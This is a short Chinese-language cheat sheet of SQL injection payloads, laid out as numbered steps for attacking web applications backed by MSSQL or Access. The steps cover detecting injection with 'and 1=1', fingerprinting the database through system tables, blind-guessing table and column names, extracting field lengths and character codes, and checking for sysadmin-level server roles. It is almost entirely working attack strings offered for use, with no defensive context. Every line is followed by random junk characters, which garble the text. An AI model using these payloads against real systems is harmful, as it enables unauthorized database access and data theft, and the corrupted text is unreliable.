1.判断是否有注入;and 1=1 ;and 1=2 M9'Qs m
2.初步判断是否是mssql ;and user>0 2A7g}V
knrR%e;
3.注入参数是字符'and [查询条件] and ''=' d0ThhO
++d(}^C;
4.搜索时没过滤参数的'and [查询条件] and '%25'=' xdb9oH
wNMg Y
5.判断数据库系统 1t haQ"
np,L39:sf
;and (select count(*) from sysobjects)>0 mssql M3c!SXx\
KKP}fN
;and (select count(*) from msysobjects)>0 access f_a.BTtNO
xP%`QTl\
<3C~<
/HbxY
6.猜数据库 ;and (select Count(*) from [数据库名])>0 eYZ{mo7
hbRDM'
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 hfT HP
WBD e`
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Rp$t;=SMD
MF:]J
9.(1)猜字段的ascii值(access) qI;"yG-x-
X_GR{z%
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 &$F4/2|b%
`##qf@M
(2)猜字段的ascii值(mssql) ~nJcHJ1nb4
T&Z%=L_Q
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ,RIGV[u
b*Ny
10.测试权限结构(mssql)
$0>>Z
eQ_dO]Q
sf )ojq6s
2<HG=iSf
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Z0*Lm+d9z
y57]q#k
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- CBw/a0Uck
EV{kd.=f
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- c&r